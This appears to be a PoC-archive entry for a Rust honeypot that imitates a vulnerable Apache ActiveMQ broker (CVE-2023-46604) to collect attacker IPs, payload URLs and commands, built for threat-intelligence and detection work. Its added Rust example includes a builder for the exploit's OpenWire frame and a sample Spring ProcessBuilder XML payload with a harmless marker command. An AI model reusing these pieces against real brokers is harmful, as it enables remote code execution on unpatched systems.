Related vulnerability
Title:
Apache ActiveMQ code issue vulnerability
(CVE-2023-46604)
Description: Apache ActiveMQ is an open-source message broker from the Apache Software Foundation (US); it supports the Java Message Service, clustering, the Spring Framework and more. Apache ActiveMQ versions before 5.15.16, 5.16.7, 5.17.6 and 5.18.3 contain a code issue vulnerability: a remote attacker with network access to the broker can run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol.
Description
CVE-2023-46604 (Apache ActiveMQ RCE Vulnerability) honeypot, focused on collecting Indicators of Compromise.
Introduction
# honeypot.rs
Honeypot that targets [CVE-2023-46604 (Apache ActiveMQ RCE Vulnerability)](https://nvd.nist.gov/vuln/detail/CVE-2023-46604) and focuses on collecting Indicators of Compromise. It can be plugged into any Threat Intelligence infrastructure to collect attacker IP addresses, post-exploitation samples and malware samples. This information helps detect and prevent future attacks.
# How it works
In a real attack the attacker sends a specific packet to the Apache ActiveMQ service. This packet contains an ExceptionResponse whose class is `org.springframework.context.support.ClassPathXmlApplicationContext` and whose message holds the URL of an XML payload.
_Attack Example_ (image)
The vulnerable service then downloads the XML payload, which usually contains the RCE command.
_XML Payload Example_ (image)
This honeypot simulates a vulnerable Apache ActiveMQ service and extracts the attacker's IP address, the XML payload URL and the RCE command from the XML payload. This information is then written as JSON so it can be parsed.
Honeypot logs are written to the `logfile` path you specify in `Service.toml`.
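The two steps above, the ExceptionResponse frame and the XML it points to, as an added example that is not code from honeypot.rs. It decodes the frame, checks for the Spring context class, and pulls the command out of the Spring bean XML the way a honeypot would before emitting IoCs. The frame layout, the sample URL, the sample XML and all function names are assumptions of this example, not taken from the project; the frame shape follows OpenWire's loose encoding as used by public PoCs, and the trailing stack-trace fields are ignored. Only the standard library is used.

```rust
// Added example, not code from honeypot.rs: decode the OpenWire ExceptionResponse frame that
// CVE-2023-46604 exploits send, and pull the IoCs out of it and out of the Spring XML it points to.
// Frame layout assumed here (OpenWire loose encoding; fields after the message are ignored):
//   u32 length | u8 type=0x1f | i32 commandId | u8 responseRequired | i32 correlationId
//   | u8 throwable-not-null | (u8 not-null, u16 len, bytes) className | (same) message

const EXCEPTION_RESPONSE: u8 = 0x1f;
pub const SPRING_CONTEXT_CLASS: &str =
    "org.springframework.context.support.ClassPathXmlApplicationContext";

#[derive(Debug, PartialEq)]
pub struct ExploitIoc { pub class_name: String, pub payload_url: String }

impl ExploitIoc {
    /// True when the attacker asked the broker to instantiate the Spring XML context class.
    pub fn is_spring_context(&self) -> bool { self.class_name == SPRING_CONTEXT_CLASS }
}

#[derive(Debug, PartialEq)]
pub enum ParseError { Truncated, NotExceptionResponse(u8), NoThrowable, BadUtf8 }

/// Loosely marshalled OpenWire string: u8 not-null flag, u16 big-endian length, UTF-8 bytes.
fn read_loose_string(buf: &[u8], pos: &mut usize) -> Result<Option<String>, ParseError> {
    let flag = *buf.get(*pos).ok_or(ParseError::Truncated)?;
    *pos += 1;
    if flag == 0 { return Ok(None); }
    let hi = *buf.get(*pos).ok_or(ParseError::Truncated)?;
    let lo = *buf.get(*pos + 1).ok_or(ParseError::Truncated)?;
    let len = u16::from_be_bytes([hi, lo]) as usize;
    *pos += 2;
    let raw = buf.get(*pos..*pos + len).ok_or(ParseError::Truncated)?;
    *pos += len;
    String::from_utf8(raw.to_vec()).map(Some).map_err(|_| ParseError::BadUtf8)
}

/// Parse one length-prefixed frame; succeeds only for an ExceptionResponse that carries a throwable.
pub fn parse_exception_response(frame: &[u8]) -> Result<ExploitIoc, ParseError> {
    if frame.len() < 4 { return Err(ParseError::Truncated); }
    let body_len = u32::from_be_bytes([frame[0], frame[1], frame[2], frame[3]]) as usize;
    let body = frame.get(4..4 + body_len).ok_or(ParseError::Truncated)?;
    let kind = *body.first().ok_or(ParseError::Truncated)?;
    if kind != EXCEPTION_RESPONSE { return Err(ParseError::NotExceptionResponse(kind)); }
    let mut pos = 1 + 4 + 1 + 4; // skip type, commandId, responseRequired, correlationId
    if *body.get(pos).ok_or(ParseError::Truncated)? == 0 { return Err(ParseError::NoThrowable); }
    pos += 1;
    let class_name = read_loose_string(body, &mut pos)?.unwrap_or_default();
    let payload_url = read_loose_string(body, &mut pos)?.unwrap_or_default();
    Ok(ExploitIoc { class_name, payload_url })
}

/// Extract the command the Spring payload would run: the <value> items in the
/// java.lang.ProcessBuilder bean's constructor-arg <list>. Plain string scanning, no XML crate.
pub fn extract_command(xml: &str) -> Option<Vec<String>> {
    let bean = xml.find("java.lang.ProcessBuilder")?;
    let list_start = bean + xml[bean..].find("<list>")?;
    let list_end = list_start + xml[list_start..].find("</list>")?;
    let mut rest = &xml[list_start..list_end];
    let mut argv = Vec::new();
    while let Some(i) = rest.find("<value>") {
        let after = &rest[i + "<value>".len()..];
        let j = after.find("</value>")?;
        argv.push(after[..j].trim().to_string());
        rest = &after[j + "</value>".len()..];
    }
    if argv.is_empty() { None } else { Some(argv) }
}

/// Encode a frame in the same layout; used here only to construct the sample input below.
pub fn build_exception_response(class_name: &str, message: &str) -> Vec<u8> {
    let mut body = vec![EXCEPTION_RESPONSE];
    // commandId=0, responseRequired=false, correlationId=0, throwable not null
    body.extend_from_slice(&[0, 0, 0, 0, 0, 0, 0, 0, 0, 1]);
    for s in [class_name, message] {
        body.push(1); // not-null flag
        body.extend_from_slice(&(s.len() as u16).to_be_bytes());
        body.extend_from_slice(s.as_bytes());
    }
    let mut frame = (body.len() as u32).to_be_bytes().to_vec();
    frame.extend_from_slice(&body);
    frame
}

/// Constructed sample of the XML a vulnerable broker would fetch; the command is a harmless marker.
pub const SAMPLE_XML: &str = r#"<beans xmlns="http://www.springframework.org/schema/beans">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg><list>
      <value>bash</value><value>-c</value><value>touch /tmp/honeypot-hit</value>
    </list></constructor-arg>
  </bean>
</beans>"#;

fn main() {
    // Constructed sample, not a real capture; 203.0.113.0/24 is a documentation address range.
    let frame = build_exception_response(SPRING_CONTEXT_CLASS, "http://203.0.113.10/poc.xml");
    match parse_exception_response(&frame) {
        Ok(ioc) if ioc.is_spring_context() => println!("payload url: {}", ioc.payload_url),
        Ok(ioc) => println!("ExceptionResponse with unexpected class {}", ioc.class_name),
        Err(e) => println!("not an exploit frame: {:?}", e),
    }
    println!("command: {:?}", extract_command(SAMPLE_XML));
}
```

The parser refuses anything that is not a complete ExceptionResponse with a throwable, so a scanner probing the port with a plain WireFormatInfo or a truncated frame does not produce a false IoC; the XML scanner deliberately never fetches the URL itself, that step belongs to the honeypot's sandboxed fetcher.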
_Honeypot Logs_ (image)
The honeypot also writes a JSON file with parsable indicators; set its path with `outfile` in `Service.toml`.
_JSON Output_ (image)
# Installation
The honeypot can be deployed on your own server (for example a VPS or VDS) as a Docker container.
### Configuration
The service configuration file `Service.toml` can be edited to suit your setup:
```
service_ip = "0.0.0.0" # listen address
service_port = 61616 # listen port (Apache ActiveMQ default is 61616)
logfile = "logs/service.log" # main log file
outfile = "logs/out.json" # JSON output for parsing
api_enabled = false # enable or disable the API for downloading honeypot results (true/false)
api_ip = "0.0.0.0" # listen address for the API
api_port = 9123 # API port
api_user = "user" # API auth user
api_password = "" # API auth password (empty by default; set one before enabling the API)
```
Enable the API if you want remote access to `out.json`. Results can be downloaded with curl:
```
curl -X POST http://<api_ip>:<api_port>/ --data 'username=<api_user>&password=<api_password>'
```
The API speaks plain HTTP and the credentials travel in the POST body, so set a non-empty `api_password` and bind `api_ip` to a private or firewalled interface rather than `0.0.0.0`.
### Using Docker
```
git clone -b main https://github.com/mranv/honeypot.rs activemq-honeypot
cd activemq-honeypot
docker compose up --build -d
```
You should also stop any existing Apache ActiveMQ instance and make sure the configured port is not in use by another process. Building the service can take some time.
You can also change `LevelFilter` to `Debug` in `main.rs` to get more detailed debug output.
_Debug LevelFilter_ (image)
File snapshot
[4.0K] /data/pocs/4de2eeafadcbdac58476167185b0d0af1984b17d
├── [4.0K] assets
│ ├── [ 22K] attack_example.png
│ ├── [ 59K] debug_level_example.png
│ ├── [ 25K] real_attack_json.png
│ ├── [136K] real_attack_logs.png
│ └── [ 75K] xml_loading_example.png
├── [ 41K] Cargo.lock
├── [ 510] Cargo.toml
├── [ 205] docker-compose.yml
├── [ 258] Dockerfile
├── [ 11K] LICENSE
├── [4.0K] logs
├── [2.7K] README.md
├── [4.0K] resources
│ └── [ 313] openwire_response.dat
├── [ 189] Service.toml
└── [4.0K] src
    ├── [3.9K] backend.rs
    ├── [ 220] data.rs
    ├── [4.9K] fakeserver.rs
    └── [7.4K] main.rs
4 directories, 17 files
Notes
1. Accessing the original source is recommended.
2. If the source is unavailable or cannot be reached, email f.jinxu#gmail.com (replace # with @) to request a local snapshot.
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.